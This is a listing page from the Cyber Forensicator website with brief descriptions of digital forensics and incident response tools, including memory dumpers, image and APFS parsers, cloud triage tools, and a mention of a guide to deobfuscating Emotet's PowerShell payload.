April 20, 2021

Cyber Forensicator

  • Articles
  • Books
  • Contact
  • How To
  • News
  • Presentations
  • Science
  • Software
  • Tips & Tricks
  • Videos
  • Webinars
  • White Papers
Home Software (page 5)

Software

Software

Imago: Digital Images Forensics Tool

Imago is a python tool that extract digital evidence from images recursively. This tool is useful throughout a digital forensic investigation. If you need to extract digital evidences and you have a lot of images, through this tool you will be able to compare them easily. Imago permits to extract the evidences into a CSV file or in a sqlite …

Read More
Software

Deobfuscating Emotet’s PowerShell Payload

Lasq has posted a step-by-step guide on how to deobfuscate Emotet’s PowerShell payload. Also he shared a Python script to automate the process. Emotet is a banking trojan, targeting computer users since around 2014.

Read More
Software

POSH-Triage

Mike Cary has written a PowerShell script that automates the use of Eric Zimmerman’s cmd line tools (https://ericzimmerman.github.io/) against a mounted forensic image. The following tools are run where applicable to the image being processed: JLECmd.exe LEcmd.exe PEcmd.exe SBECmd.exe AppCompatParser.exe AmcacheParser.exe RecentFileCacheParser.exe WxTCmd.exe MFTECmd.exe Registry Explorer project file creation Learn more about the script at Mike’s GitHub.

Read More
Software

Diffy: A Triage Tool for Cloud-Centric Incident Response

Diffy is a digital forensics and incident response (DFIR) tool developed by Netflix’s Security Intelligence and Response Team (SIRT). Diffy allows a forensic investigator to quickly scope a compromise across cloud instances during an incident, and triage those instances for followup actions. Diffy is currently focused on Linux instances running within Amazon Web Services (AWS), but owing to our plugin …

Read More
Software

Office365 Log Analysis Framework

After yesterday’s webcast Matt Bromiley released his Office365 Log Analysis Framework or OLAF to the public. You can learn more about the framework and download it here. Also, make sure you have checked this webcast.

Read More
Software

LiMEaide: Dump Linux Memory Remotely

LiMEaide is a python application designed to remotely dump RAM of a Linux client and create a volatility profile for later analysis on your local host. This will simplify Linux digital forensics in a remote environment. In order to use LiMEaide all you need to do is feed a remote Linux client IP address, sit back, and consume your favorite …

Read More
Software

Memtriage: a tool for Windows memory live analysis

Memtriage allows you to quickly query a live Windows machine for RAM artifacts. This tool utilizes the Winpmem drivers to access physical memory, and Volatility for analysis. Learn more about it here.

Read More
Software

afro (APFS file recovery)

afro can parse APFS images. It not only extracts the latest data but also older versions of the files. Learn more about the tool here.

Read More
Software

Epochalypse: Utility to Convert Epoch Timestamps

Epochalypse utility by Pasquale Stirparo has been updated. Now it supports APFS timestamps. You can download this Python script at Pasquale’s GitHub.

Read More
Software

Darwin-Collector – collect key files for macOS investigations

Darwin-Collector.sh is a script designed to be run against a mounted image, live system, or device in target disk mode. The script automates the collection of key files for MacOS investigations. You can learn more about the tool and download it here.

Read More
Page 5 of 14First...34567 10...Last

Follow Us

About Us

Cyber Forensicator is a web-project by Igor Mikhaylov and Oleg Skulkin aiming on collecting all most interesting and important cyber and digital forensics news, articles, presentations, and so on, in one place.

Popular Posts

Open Sourcing JA3: SSL/TLS Client Fingerprinting for Malware Detection

October 20, 2017

Cloud Forensics: Analyzing MEGASync

April 15, 2018

Windows Phone Physical Imaging Without JTAG and Chip-off

June 3, 2018

Timeline

  • March 4, 2021

    Find out what happened during a ransomware attack on computer

  • January 24, 2021

    Analyzing videos with multiple video streams in digital forensics

  • December 19, 2020

    PC3000 Portable III in Digital Forensics

  • December 18, 2020

    How to analyze different types of devices and find connections between them

  • July 5, 2020

    Threat Hunting: What it Is, and What it Is Not

CyberForensicator.com © Copyright 2016-2021, All Rights Reserved

Login

Welcome!Log into your account